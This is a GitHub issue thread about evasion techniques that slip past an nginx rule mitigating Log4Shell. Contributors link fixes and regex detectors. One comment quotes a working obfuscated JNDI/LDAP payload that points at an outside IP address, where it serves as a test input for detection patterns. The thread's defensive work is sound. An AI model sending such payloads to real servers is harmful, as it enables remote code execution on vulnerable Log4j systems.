New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Another evasion method #9
Comments
Ah yes, I saw those here: Neo23x0/log4shell-detector#5 (comment) |
yes. i'm currently testing. will make PR in couple minutes |
Also doing some local changes and tests, but I'm pretty confident you will have a working fix much quicker than me 😁 |
Possible fix for this issue: https://github.com/infiniroot/nginx-mitigate-log4shell/blob/issue-9/mitigate-log4shell.conf
However a mix of lower and upper is not detected:
|
Did you see my PR? It fixes all of them. |
Check out my Log4Shell-Rex, that already finds this: https://github.com/back2root/log4shell-rex |
fixed by #12 |
https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6: >>> from log4shell_regexes import *
>>> t = lambda s: [k for k in test(s)]
>>> t('${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}')
['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE'] |
Received an anonymous tip (that sounds so weird but it's true), that certain evasion methods still work:
The text was updated successfully, but these errors were encountered: